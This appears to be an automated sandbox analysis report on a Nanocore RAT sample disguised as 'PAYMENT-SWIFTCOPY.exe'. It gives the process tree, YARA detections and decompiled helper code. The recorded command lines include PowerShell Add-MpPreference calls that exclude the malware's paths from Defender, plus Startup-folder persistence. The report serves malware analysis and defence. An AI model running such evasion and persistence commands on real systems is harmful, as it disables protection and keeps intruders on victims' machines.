                                                                                                2021-10-26 15:35:18 UTC8378INData Raw: 53 20 4f 6e 20 53 20 54 54 53 20 53 20 54 53 53 20 53 20 54 54 50 20 53 20 55 67 20 53 20 54 53 54 20 53 20 4f 4f 20 53 20 54 54 70 20 53 20 54 53 50 20 53 20 54 54 54 20 53 20 54 54 53 20 53 20 54 67 20 53 20 54 53 20 53 20 54 67 20 53 20 54 53 20 53 20 4f 54 20 53 20 55 4d 20 53 20 54 54 6e 20 53 20 54 54 53 20 53 20 55 53 20 53 20 54 54 69 20 53 20 54 53 54 20 53 20 55 67 20 53 20 54 53 54 20 53 20 54 54 70 20 53 20 54 54 6e 20 53 20 54 54 4d 20 53 20 70 6e 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 54 53 4f 20 53 20 4f 6e 20 53 20 54 54 53 20 53 20 54 53 53 20 53 20 54 54 50 20 53 20 55 67 20 53 20 54 53 54 20 53 20 4f 4f 20 53 20 54 54 70 20 53 20 54 53 50 20 53 20 54 54 54 20 53 20 54 54 53 20 53 20 4f 67 20 53 20 54 67 20 53 20 54 53 20 53 20 50
                                                                                                Data Ascii: S On S TTS S TSS S TTP S Ug S TST S OO S TTp S TSP S TTT S TTS S Tg S TS S Tg S TS S OT S UM S TTn S TTS S US S TTi S TST S Ug S TST S TTp S TTn S TTM S pn S TTT S TSO S TSO S On S TTS S TSS S TTP S Ug S TST S OO S TTp S TSP S TTT S TTS S Og S Tg S TS S P
                                                                                                2021-10-26 15:35:18 UTC8394INData Raw: 55 53 20 54 4f 50 20 55 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 4f 50 20 70 6e 20 54 54 54 20 54 54 69 20 70 4f 20 54 4d 53 20 54 53 54 20 6e 6e 20 4f 6e 20 54 53 50 20 54 54 53 20 53 20 54 53 4f 20 54 54 50 20 4f 4f 20 54 54 54 20 54 54 69 20 54 53 54 20 54 53 54 20 69 70 20 54 53 53 20 54 53 55 20 54 53 55 20 53 20 53 20 53 20 53 20 53 20 4d 50 50 20 67 6e 20 53 20 67 4d 20 70 69 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20 53 20
                                                                                                Data Ascii: US TOP U S S S S S S S S S S S S S S S OP pn TTT TTi pO TMS TST nn On TSP TTS S TSO TTP OO TTT TTi TST TST ip TSS TSU TSU S S S S S MPP gn S gM pi S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S S


                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Start time:17:34:14
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe'
                                                                                                Imagebase:0x830000
                                                                                                File size:400384 bytes
                                                                                                MD5 hash:788C7A25B15A7263C24C4060F0C0DF6A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.402923384.0000000007021000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.405143102.0000000008120000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.405143102.0000000008120000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.406478127.0000000008FB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.406478127.0000000008FB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:17:34:19
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                Imagebase:0x7ff797770000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:17:34:21
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                Imagebase:0x7ff797770000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:17:34:26
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                Imagebase:0x400000
                                                                                                File size:91000 bytes
                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:17:34:28
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /SpecialRun 4101d8 4952
                                                                                                Imagebase:0x400000
                                                                                                File size:91000 bytes
                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:17:34:29
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                Imagebase:0x7ff797770000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:17:34:32
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                Imagebase:0x7ff797770000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:17:34:32
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                Imagebase:0x7ff797770000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:17:34:33
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                Imagebase:0x7ff797770000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:17:34:34
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
                                                                                                Imagebase:0x1390000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                General

                                                                                                Start time:17:34:34
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                Imagebase:0x7ff797770000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:17:34:34
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:17:34:35
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
                                                                                                Imagebase:0x1390000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                General

                                                                                                Start time:17:34:35
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
                                                                                                Imagebase:0x1390000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                General

                                                                                                Start time:17:34:35
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:17:34:36
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:17:34:37
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
                                                                                                Imagebase:0x1390000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                General

                                                                                                Start time:17:34:38
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
                                                                                                Imagebase:0x1390000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                General

                                                                                                Start time:17:34:38
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:17:34:39
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:17:34:39
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe'
                                                                                                Imagebase:0xaf0000
                                                                                                File size:400384 bytes
                                                                                                MD5 hash:788C7A25B15A7263C24C4060F0C0DF6A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe, Author: Florian Roth
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 25%, ReversingLabs

                                                                                                General

                                                                                                Start time:17:34:42
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
                                                                                                Imagebase:0x1390000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                General

                                                                                                Start time:17:34:43
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
                                                                                                Imagebase:0x1390000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                General

                                                                                                Start time:17:34:43
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:17:34:44
                                                                                                Start date:26/10/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
                                                                                                Imagebase:0x1390000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                Disassembly

                                                                                                Code Analysis

                                                                                                Reset < >

                                                                                                  Executed Functions

                                                                                                  C-Code - Quality: 93%
                                                                                                  			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                  				void* _v8;
                                                                                                  				void* _v12;
                                                                                                  				char _v16;
                                                                                                  				char _v24;
                                                                                                  				char _v32;
                                                                                                  				char _v40;
                                                                                                  				char _v48;
                                                                                                  				intOrPtr _v52;
                                                                                                  				char _v576;
                                                                                                  				long _v580;
                                                                                                  				intOrPtr _v1112;
                                                                                                  				long _v1128;
                                                                                                  				void _v1132;
                                                                                                  				void* _v1136;
                                                                                                  				void _v1658;
                                                                                                  				char _v1660;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				void* _t41;
                                                                                                  				long _t49;
                                                                                                  				void* _t50;
                                                                                                  				intOrPtr* _t66;
                                                                                                  				struct HINSTANCE__* _t68;
                                                                                                  				void* _t71;
                                                                                                  				void* _t83;
                                                                                                  				void* _t84;
                                                                                                  				void* _t85;
                                                                                                  
                                                                                                  				_t78 = _a4;
                                                                                                  				E004099D4(_a4 + 0x28);
                                                                                                  				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                  				_v12 = _t41;
                                                                                                  				memset( &_v1132, 0, 0x228);
                                                                                                  				_t84 = _t83 + 0xc;
                                                                                                  				_v1136 = 0x22c;
                                                                                                  				Process32FirstW(_v12,  &_v1136); // executed
                                                                                                  				while(Process32NextW(_v12,  &_v1136) != 0) {
                                                                                                  					E004090AF( &_v580);
                                                                                                  					_t49 = _v1128;
                                                                                                  					_v580 = _t49;
                                                                                                  					_v52 = _v1112;
                                                                                                  					_t50 = OpenProcess(0x410, 0, _t49);
                                                                                                  					_v8 = _t50;
                                                                                                  					if(_t50 != 0) {
                                                                                                  						L4:
                                                                                                  						_v1660 = 0;
                                                                                                  						memset( &_v1658, 0, 0x208);
                                                                                                  						_t85 = _t84 + 0xc;
                                                                                                  						E004098F9(_t78, _v8,  &_v1660);
                                                                                                  						if(_v1660 != 0) {
                                                                                                  							L10:
                                                                                                  							E0040920A( &_v576,  &_v1660);
                                                                                                  							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                  							_t84 = _t85 + 0x14;
                                                                                                  							CloseHandle(_v8);
                                                                                                  							_t78 = _a4;
                                                                                                  							L11:
                                                                                                  							E004099ED(_t78 + 0x28,  &_v580);
                                                                                                  							continue;
                                                                                                  						}
                                                                                                  						_v16 = 0x104;
                                                                                                  						if( *0x41c8e0 == 0) {
                                                                                                  							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                                                  							if(_t68 != 0) {
                                                                                                  								 *0x41c8e0 = 1;
                                                                                                  								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_t66 =  *0x41c8e4;
                                                                                                  						if(_t66 != 0) {
                                                                                                  							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                                                  						}
                                                                                                  						goto L10;
                                                                                                  					}
                                                                                                  					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                                                  					_v8 = _t71;
                                                                                                  					if(_t71 == 0) {
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					goto L4;
                                                                                                  				}
                                                                                                  				return CloseHandle(_v12);
                                                                                                  			}






























                                                                                                  0x00409609
                                                                                                  0x0040960f
                                                                                                  0x00409619
                                                                                                  0x00409623
                                                                                                  0x0040962e
                                                                                                  0x00409633
                                                                                                  0x00409640
                                                                                                  0x0040964a
                                                                                                  0x00409782
                                                                                                  0x0040965a
                                                                                                  0x0040965f
                                                                                                  0x00409678
                                                                                                  0x0040967e
                                                                                                  0x00409681
                                                                                                  0x00409685
                                                                                                  0x00409688
                                                                                                  0x004096b2
                                                                                                  0x004096bf
                                                                                                  0x004096c6
                                                                                                  0x004096cb
                                                                                                  0x004096da
                                                                                                  0x004096e6
                                                                                                  0x0040973b
                                                                                                  0x00409747
                                                                                                  0x0040975f
                                                                                                  0x00409764
                                                                                                  0x0040976a
                                                                                                  0x00409770
                                                                                                  0x00409773
                                                                                                  0x0040977d
                                                                                                  0x00000000
                                                                                                  0x0040977d
                                                                                                  0x004096ee
                                                                                                  0x004096f5
                                                                                                  0x004096fc
                                                                                                  0x00409704
                                                                                                  0x0040970c
                                                                                                  0x0040971c
                                                                                                  0x0040971c
                                                                                                  0x00409704
                                                                                                  0x00409721
                                                                                                  0x00409728
                                                                                                  0x00409739
                                                                                                  0x00409739
                                                                                                  0x00000000
                                                                                                  0x00409728
                                                                                                  0x00409693
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004096a5
                                                                                                  0x004096a9
                                                                                                  0x004096ac
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004096ac
                                                                                                  0x004097a6

                                                                                                  APIs
                                                                                                    • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                  • memset.MSVCRT ref: 0040962E
                                                                                                  • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                  • memset.MSVCRT ref: 004096C6
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                  • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                  • API String ID: 239888749-1740548384
                                                                                                  • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                  • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                  • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                  • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 75%
                                                                                                  			E00401C26(long _a4) {
                                                                                                  				struct _SHELLEXECUTEINFOW _v68;
                                                                                                  				void _v582;
                                                                                                  				char _v584;
                                                                                                  				void _v1110;
                                                                                                  				char _v1112;
                                                                                                  				long _t23;
                                                                                                  				int _t36;
                                                                                                  				int _t41;
                                                                                                  				void* _t43;
                                                                                                  				long _t44;
                                                                                                  
                                                                                                  				_t44 = 0;
                                                                                                  				_t23 = GetCurrentProcessId();
                                                                                                  				_v584 = 0;
                                                                                                  				memset( &_v582, 0, 0x1fe);
                                                                                                  				_v1112 = 0;
                                                                                                  				memset( &_v1110, 0, 0x208);
                                                                                                  				E00404AD9( &_v1112);
                                                                                                  				_push(_t23);
                                                                                                  				_push(0);
                                                                                                  				_push(_a4);
                                                                                                  				_push(L"/SpecialRun %I64x %d");
                                                                                                  				_push(0xff);
                                                                                                  				_push( &_v584);
                                                                                                  				L0040B1EC();
                                                                                                  				memset( &(_v68.fMask), 0, 0x38);
                                                                                                  				_v68.lpFile =  &_v1112;
                                                                                                  				_v68.lpParameters =  &_v584;
                                                                                                  				_v68.cbSize = 0x3c;
                                                                                                  				_v68.lpVerb = L"RunAs";
                                                                                                  				_v68.fMask = 0x40;
                                                                                                  				_v68.nShow = 5;
                                                                                                  				_t36 = ShellExecuteExW( &_v68); // executed
                                                                                                  				_t43 = _v68.hProcess;
                                                                                                  				if(_t36 == 0) {
                                                                                                  					_t44 = GetLastError();
                                                                                                  				} else {
                                                                                                  					WaitForSingleObject(_t43, 0x5dc);
                                                                                                  					_a4 = 0;
